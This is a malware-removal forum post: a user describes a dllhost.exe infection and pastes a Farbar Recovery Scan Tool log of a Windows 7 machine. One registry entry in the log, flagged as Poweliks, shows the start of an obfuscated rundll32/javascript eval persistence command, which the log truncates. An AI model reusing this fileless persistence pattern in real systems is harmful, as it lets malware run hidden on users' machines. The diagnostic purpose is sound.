Jump to content

dllhost.exe virus and Its Insatiable Hunger for Using RAM and Creating Malwarebytes Notifications


Vitharr
 Share

Recommended Posts

As does its lesser known, yet still just as annoying siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time, that I've seen, after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe the latter was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT!

I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank.

The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola.

An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by Calahan (administrator) on HP8100-2 on 10-11-2014 22:57:24
Running from C:\Users\Calahan\Downloads
Loaded Profile: Calahan (Available profiles: Mike2 & Logan & Elisa & Calahan & Administrator & Guest)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
() C:\Program Files\Plantronics\GameCom780\GameCom780.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
() C:\Users\Calahan\Downloads\nffvqpeh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will 
 
not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7938080 2009-07-02] (Realtek 
 
Semiconductor)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [196648 2009-06-03] 
 
(ActivIdentity)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [483880 2009-06-03] 
 
(ActivIdentity)
HKLM\...\Run: [GamecomSound] => C:\Program Files\Plantronics\GameCom780\GameCom780.exe [777448 2011-12-01] ()
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] 
 
(Microsoft Corporation)
HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS
 
\PIconStartup.exe [111640 2009-11-04] ()
HKLM-x32\...\Run: [File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exe
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] 
 
(Microsoft Corporation)
HKLM-x32\...\Run: [tvncontrol] => C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] 
 
(Adobe Systems Incorporated)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] 
 
(Logitech Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 
 
2014-05-07] (Oracle Corporation)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe 
 
[767200 2014-04-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-
 
Malware\mbamdor.exe [54072 2014-10-01] (Malwarebytes Corporation)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe 
 
[55360 2014-06-24] (Raptr, Inc)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [HydraVisionDesktopManager] => C:\Program Files 
 
(x86)\ATI Technologies\HydraVision\HydraDM.exe [380928 2009-10-19] (AMD)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf
 
\Overwolf.exe [39712 2014-10-22] (Overwolf LTD)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..
 
\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). 
 
<==== Poweliks!
Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Folding@home.lnk
ShortcutTarget: Folding@home.lnk -> C:\Program Files (x86)\FAHClient\HideConsole.exe ()
Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper 
 
and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office
 
\Office14\ONENOTEM.EXE (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:Tabs
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}
 
&l=dis&o=CMDTDF
SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}
 
&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDF
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}
 
&l=dis&o=CMDTDF
SearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p=
 
{searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDF
SearchScopes: HKCU - DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = 
SearchScopes: HKCU - {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office
 
\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files
 
\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files 
 
(x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office
 
\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft 
 
Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java
 
\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common 
 
Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files 
 
(x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files 
 
(x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java
 
\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-
 
4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} -  No File
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet 
 
Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System
 
\BAVoilaX.dll (Belarc, Inc.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype
 
\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet 
 
Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75 192.168.3.1
 
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( 
 
Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft 
 
Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin
 
\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll 
 
(Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight
 
\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft 
 
Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft 
 
Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update
 
\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update
 
\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users
 
\Calahan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft
 
\Ubisoft Game Launcher\npuplaypc.dll ()
 
Chrome: 
=======
CHR HomePage: Default -> 
CHR StartupUrls: Default -> ""
CHR Profile: C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data
 
\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-31]
CHR Extension: (AdBlock) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions
 
\gighmmpiobklfepjocnamgkkbiglidom [2014-11-05]
CHR Extension: (Google Wallet) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions
 
\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-14]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars
 
\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2014
 
-07-14]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved 
 
unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [277032 2009-06-03] 
 
(ActivIdentity)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-
 
14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft 
 
Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] 
 
(Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes 
 
Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-04-07] (Hewlett-Packard) [File not signed]
S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [997664 2014-10-22] (Overwolf LTD)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-04-07] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2014-02-28] ()
R2 tvnserver; C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)
S2 dwmrcs; No ImagePath
S2 HP Health Check Service; "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe" [X]
S3 hpqwmiex; "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved 
 
unless listed separately.)
 
R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)
R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-10] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [32224 2009-09-21] (Intel Corporation ) [File not signed]
R3 PlantronicsGC; C:\Windows\System32\drivers\PLTGC.sys [1327104 2011-11-04] (C-Media Electronics Inc)
S3 PTHDRBUS; C:\Windows\System32\DRIVERS\PTHDRBUS.sys [69264 2009-12-15] (DEVGURU Co., LTD.)
S3 PTHDRMDM; C:\Windows\System32\DRIVERS\PTHDRMDM.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 PTHDRVSP; C:\Windows\System32\DRIVERS\PTHDRVSP.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
U3 uxryipod; \??\C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed 
 
separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-10 22:57 - 2014-11-10 22:57 - 00017513 _____ () C:\Users\Calahan\Downloads\FRST.txt
2014-11-10 22:43 - 2014-11-10 22:43 - 00000000 ____D () C:\Users\Calahan\Downloads\tdsskiller
2014-11-10 22:42 - 2014-11-10 22:42 - 04163057 _____ () C:\Users\Calahan\Downloads\tdsskiller.zip
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-11-10 21:14 - 2014-11-10 22:57 - 00000000 ____D () C:\FRST
2014-11-10 21:13 - 2014-11-10 21:13 - 02116096 _____ (Farbar) C:\Users\Calahan\Downloads\FRST64.exe
2014-11-10 20:59 - 2014-11-10 20:59 - 00000129 _____ () C:\Users\Calahan\Downloads\malwarebytes.txt
2014-11-10 20:30 - 2014-11-10 20:31 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads
 
\mbam_premium.exe
2014-11-10 20:17 - 2014-11-10 20:16 - 00042070 _____ () C:\Users\Calahan\Downloads\NOV-10-14.xml
2014-11-10 20:16 - 2014-11-10 20:16 - 00000049 _____ () C:\Users\Calahan\Downloads\NOV-10-14.txt
2014-11-10 19:43 - 2014-11-10 20:56 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers
 
\MBAMSwissArmy.sys
2014-11-10 19:43 - 2014-11-10 20:31 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs
 
\Malwarebytes Anti-Malware
2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-11-10 19:43 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers
 
\mbamchameleon.sys
2014-11-10 19:43 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers
 
\mwac.sys
2014-11-10 19:43 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers
 
\mbam.sys
2014-11-10 19:41 - 2014-11-10 19:42 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam-
 
setup-2.0.3.1025.exe
2014-11-09 23:50 - 2014-11-09 23:50 - 00003056 _____ () C:\Windows\System32\Tasks\{44A1741A-3325-5E3D-3774-
 
F73A5D212500}
2014-11-05 16:54 - 2014-11-05 16:54 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\BMMCegjc
2014-11-04 16:36 - 2014-11-04 16:36 - 00000000 ____D () C:\Users\Calahan\AppData\Local\FalloutNV
2014-11-04 01:12 - 2014-11-04 01:12 - 00000000 ____D () C:\Users\Calahan\Documents\Activision
2014-11-03 21:31 - 2014-11-03 21:31 - 00000209 _____ () C:\Users\Calahan\Downloads\1OVPH1R.mp4
2014-11-03 19:34 - 2014-11-10 19:38 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Coxoik
2014-11-03 19:34 - 2014-11-03 19:36 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Kudo
2014-11-03 18:39 - 2014-11-03 19:34 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-31 20:26 - 2014-11-02 21:02 - 00000000 ____D () C:\Users\Calahan\Documents\Prototype
2014-10-30 18:17 - 2014-10-30 18:17 - 00001419 _____ () C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start 
 
Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-29 19:50 - 2014-09-19 19:09 - 17867776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-29 19:50 - 2014-09-19 18:55 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-29 19:50 - 2014-09-19 18:50 - 01385472 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-29 19:50 - 2014-09-19 18:49 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-29 19:50 - 2014-09-19 18:48 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-29 19:50 - 2014-09-19 18:48 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 02157056 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-29 19:50 - 2014-09-19 18:46 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-29 19:50 - 2014-09-19 18:46 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-29 19:50 - 2014-09-19 18:45 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-29 19:50 - 2014-09-19 18:45 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-29 19:50 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-29 19:50 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-29 19:50 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-29 19:50 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-29 19:50 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-29 19:50 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-29 19:50 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-29 19:50 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-29 19:50 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-29 19:50 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-29 19:49 - 2014-09-19 18:54 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-29 19:49 - 2014-09-19 18:48 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-29 19:49 - 2014-09-19 18:47 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-29 19:49 - 2014-09-19 18:46 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-29 19:49 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
